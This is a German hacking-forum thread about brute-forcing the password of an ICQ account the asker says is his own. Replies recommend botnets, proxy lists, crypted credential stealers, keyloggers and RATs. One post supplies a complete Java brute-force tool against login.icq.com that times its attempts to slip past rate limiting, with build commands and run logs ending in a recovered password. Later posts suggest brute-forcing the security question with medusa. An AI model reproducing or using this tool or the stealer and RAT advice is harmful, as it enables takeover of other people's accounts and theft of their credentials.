Hallo liebe Free-Hack Community,
mein vorhaben: Eine alte ICQ Nummer von mir Bruteforcen
Probleme:
-Richtiges Programm?!
-Das Passwort enthält sowohl Zahlen als auch Buchstaben und Sonderzeichen

Könnt ihr mir Tipps geben?
Hat es überhaupt Sinn diese Bruteforcen zu wollen? Oder wär ich da Jahre beschäftigt bzw. bekomme vorher Post von meinem Inet anbieter das ich die DDOS Attacken auf den ICQ Server bitte unterlassen möge..

Schonmal THX für eure Antworten

gruss
cr4x

Hätte keinen Sinn da das Programm die Kombination der Buchstaben etc. nicht beinhaltet

ICQ bannt nach ein paar Versuchen die IP. Also entweder große Proxyliste, dann würde es zwar sehr lange dauern, aber unter Umständen gehen, oder großes Botnet.
Ich denke für dich kommt weder das eine, noch das andere in Frage => Lass es bleiben ;)

Wenn du kein Passwort mit Sonderzeichen etc. hättest wäre es vllt. noch gegangen.
Du benutzt beim bruten aber eine Psswort Liste d.h. dein Passwort was du bei icq hast muss auch irgendwo in dieser Liste sein die du zum bruten benutzt.
Selbst wenn dein Passwort nur aus klein Buchstaben wäre, bräuchtest du wahrscheinlich ein Botnet / Proxys oder müsstest immer darauf warten bis icq deine ip wieder frei gibt.
Deshalb, selbst wenn man davon ausgehn würde das du ein Botnet hättest und eine große Passwortliste, könnte man davon ausgehen das du es nicht schaffst, weil deine Liste das Passwort nicht beinhaltet.
Eine andere Möglichkeit wäre natürlich noch das stealen. Kannst ja mal in der Sektion gucken. Das Problem hierbei ist wieder das du der Person die sich auf deinem Icq Konto einloggen kann erst mal den Stealer schicken musst.
Außerdem müsste der dann FUD oder zumindestens UD sein, dass heißt du müsstest dir entweder selber einen coden der schon FUD ist oder dir einen Crypter kaufen / coden.
Dann müsste er nur noch deinen Stealer ausführen und du bekommst das Passwort wieder, vorrausgesetzt er hat das Passwort gespeichert. Natürlich würde auch noch ein Keylogger gehen der einfach alles aufzeichnet was er tippt. Oder du machst gleich nen RAT drauf :D


PS: Sry das es so "gut" strukturiert ist ><

machs doch ganz einfach die klick auf Pw vergessen beantworte sicherheitsfrage wenn du antwort drauf nimmer weißt dann klick auf : das ist nicht meine sicherheitsfrage (ka wie genau der text heißt) dann gib die e mail adresse an die du bei der icq registrieung angegeben hast ... dort wird dir dann das neue pw zugeschickt

hfgl
max

Wenn du kein Passwort mit Sonderzeichen etc. hättest wäre es vllt. noch gegangen.
Du benutzt beim bruten aber eine Psswort Liste d.h. dein Passwort
Bruten == Passwort cracken durch Bruteforcing (versucht wirklich alle Möglichen Passwörter)
Cracken mit Wordlist == Das was du meinst.

@Topic:
Das wirst du kaum schaffen ,außer du hast ein paar Jahre Zeit und viele Proxys.
Und das würd sich eigentlich nur für eine 2-stellige UIN lohnen :P

Brute Force bedeutet hier also simples Ausprobieren von möglichen Passwörtern. Vordefinierte Hash-Listen häufig verwendeter Passwörter nennt man „Rainbow Table (http://de.wikipedia.org/wiki/Rainbow_Table)“.

Dachte das wäre dasselbe oO

@Topic:
Wenn es eine ganz normale ICQ UIN ist (9 stellig) dann mach dir doch einfach ne neue und versuch deine Kontakte wiederzufinden wenn du willst kann ich dir ne 8er UIN geben ;D

naja mit Bruteforcern kannst du das vergessen, da dieses Passwort Zahlen, Buchstaben und Sonderzeichen enthält wird dies ewig dauern
...aber gibt es nicht diese tollen Sicherheitsfragen um das Password zu ändern?^^

Stimmt eigentlich schon :D
Hast du eine Sicherheitsfrage angegeben?
Kannst du nicht die UIN über deine email wieder zurückholen?

1. Hab keine Sicherheitsfrage Angegeben
2. Weiss ich auch nicht welche meiner *ironie on* 132.589 *ironie off* Email Adressen ich benutzt haben

:-/
Naja werd ich wohl Pech gehabt haben... *grummel*

-Das Passwort enthält sowohl Zahlen als auch Buchstaben und Sonderzeichen



kannst du die Nummer vergessen 1000%

Hi,

wie oben schon Mr. Greenie erwähnt hat, wird die IP nahc ein paar Versuche gebannt und man brächte eine Proxy Server Liste. Es gibt zwar Methoden, wie man unter Umständen auch 100% sichere Passwörter bruten kann, das kommt aber auf keinen Fall für einen Einsteiger in Frage.

Ich hoffe, dass ich dir da etwas helfen konnte.

Gruß

Slawa

wie oben schon Mr. Greenie erwähnt hat, wird die IP nahc ein paar Versuche gebannt und man brächte eine Proxy Server ListeGeht ganz ohne Proxyliste - man muss nur zwischen Logins >4 Sekunden Zeit lassen und manchmal nach ~15 Versuchen reconnecten:

Proof Of Concept:
Java, verwendet JOscarLib_0.5.jar


import java.io.BufferedReader;
import java.io.FileReader;

import JOscarLib.Core.OscarConnection;

public class ICQLogin implements Thread.UncaughtExceptionHandler
{
private boolean success=false;

public static void main(String[] args)
{
if (args.length!=3)
{
System.out.println("Nutzung:\n"+
"java -cp .;JOscarLib_0.5.jar ICQLogin ICQNum "+
"Sleeptime Passwordfile");
return;
}
ICQLogin login = new ICQLogin();
Thread.setDefaultUncaughtExceptionHandler(login);

try
{
BufferedReader input = new BufferedReader(new FileReader(args[2]));
String pass;
int icqnum=Integer.parseInt(args[0]);
int sleeptime=Integer.parseInt(args[1])*1000;

while(((pass=input.readLine())!=null)&&(!login.success))
{
login.connect(icqnum,pass,sleeptime);
}

System.out.println("Passwort: \n"+pass);
}catch(Exception ex)
{
System.out.println("Fehler:\n"+ex);
}

}

public boolean connect(int icqnum, String pass,int sleeptime)
{
OscarConnection con;
try
{ //die Lib gibt zuviele Statusmeldungen aus - unterdrücken
System.setErr(new java.io.PrintStream(new java.io.OutputStream()
{public void write(int b){}}));
success=true; //verquirktes Fehlerprinzip, aber keine Lust was anderes zu suchen
System.out.println("versuche: " + icqnum + " " + pass);
con = new OscarConnection("login.icq.com", 5190, Integer
.toString(icqnum), pass);
Thread.sleep(sleeptime); // Abwarten, ob ein Login möglich ist
con.close();
return success;
} catch (Exception ex)
{
System.out.println(ex.getMessage());
}
return false;
}

public void uncaughtException(Thread t, Throwable e)
{
System.out.println(e.getMessage());
success=false;
}


}



Makefile


javac -cp ../JOscarLib_0.5.jar ICQLogin.java
Run:
IcqNummer Pause_in_Sek Passwordfile


java -cp .;JOscarLib_0.5.jar ICQLogin 123456 5 mydic.txt
Bsp Log:


c:\ICQlogin\project>run 4841796xx 4 pass.txt
versuche: 4841796xx SennSe
Problem due to : Password incorrect.
versuche: 4841796xx SennS3
Problem due to : Password incorrect.
versuche: 4841796xx Sennse
Problem due to : Password incorrect.
versuche: 4841796xx Senns3
Problem due to : Rate limit exceeded. Please try to reconnect in a few minutes.
Wenn man im Abstand von 5 Sekunden versucht:


c:\ICQlogin\project>run 4841796xx 5 pass.txt
versuche: 4841796xx SennSe
Problem due to : Password incorrect.
versuche: 4841796xx SennS3
Problem due to : Password incorrect.
versuche: 4841796xx Sennse
Problem due to : Password incorrect.
versuche: 4841796xx Senns3
Problem due to : Password incorrect.
versuche: 4841796xx Senn$e
Problem due to : Password incorrect.
versuche: 4841796xx Senn$3
Problem due to : Password incorrect.
versuche: 4841796xx Sennºe
Problem due to : Password incorrect.
versuche: 4841796xx Sennº3
Problem due to : Password incorrect.
versuche: 4841796xx S3nnSe
Problem due to : Password incorrect.
versuche: 4841796xx S3nnS3
Problem due to : Password incorrect.
versuche: 4841796xx S3nnse
Problem due to : Password incorrect.
versuche: 4841796xx S3nns3
Problem due to : Password incorrect.
versuche: 4841796xx S3nn$e
Problem due to : Rate limit exceeded. Please try to reconnect in a few minute

Batchvorgang abbrechen (J/N)? n
Drücken Sie eine beliebige Taste . . .

ganz normaler reconnect

C:\ICQlogin\project>run 4841796xx 5 pass.txt
versuche: 4841796xx SennSe
Problem due to : Password incorrect.
versuche: 4841796xx SennS3
Problem due to : Password incorrect.
versuche: 4841796xx Sennse
Problem due to : Password incorrect.
versuche: 4841796xx Senns3
Problem due to : Password incorrect.
versuche: 4841796xx Senn$e
Problem due to : Password incorrect.
versuche: 4841796xx Senn$3
Problem due to : Password incorrect.
versuche: 4841796xx Sennºe
Problem due to : Password incorrect.
versuche: 4841796xx Sennº3
Problem due to : Password incorrect.
versuche: 4841796xx S3nnSe
Problem due to : Password incorrect.
versuche: 4841796xx S3nnS3
Problem due to : Password incorrect.
versuche: 4841796xx S3nnse
Problem due to : Password incorrect.
versuche: 4841796xx S3nns3
Problem due to : Password incorrect.
versuche: 4841796xx S3nn$e
Problem due to : Password incorrect.
versuche: 4841796xx S3nn$3
Problem due to : Password incorrect.
versuche: 4841796xx S3nnºe
Problem due to : Password incorrect.
versuche: 4841796xx S3nnº3
Problem due to : Password incorrect.
Passwort:
sexxxe
Drücken Sie eine beliebige Taste . . .

Das ist auf die Schnelle geschrieben und hat keine automatisches Reconnect (ja, ich bin faul ;) ) - im Bsp Log oben habe ich allerdings direkt wieder mit ICQ Server verbunden und nicht etwa minutenlang abgewartet. Beim zweiten mal ging das sogar komplett durch ohne "Sperrung" :)
Zusätzlich sollte es mehrere ICQ Server geben - so dass man die "Brutegeschwindigkeit" von einem Rechner aus nochmal deutlich steigern kann (weil 60/5=12 Passwörter in der Minute doch etwas arg wenig sind ;) ). Lohnt sich aber trotzdem nur für den Fall dass man nur mehrere tausend Passwörter ausprobieren muss.

machs doch ganz einfach die klick auf Pw vergessen beantworte sicherheitsfrage wenn du antwort drauf nimmer weißt dann klick auf : das ist nicht meine sicherheitsfrage (ka wie genau der text heißt) dann gib die e mail adresse an die du bei der icq registrieung angegeben hast ... dort wird dir dann das neue pw zugeschickt

hfgl
max
interessant wäre doch die frage, ob man die "sicherheitsfrage" bruteforcen könnte, z.B. mit einem medusa http-form web-modul ?!

Wenn du die nummer hast wird es reichen da du unter profil schauen kannst.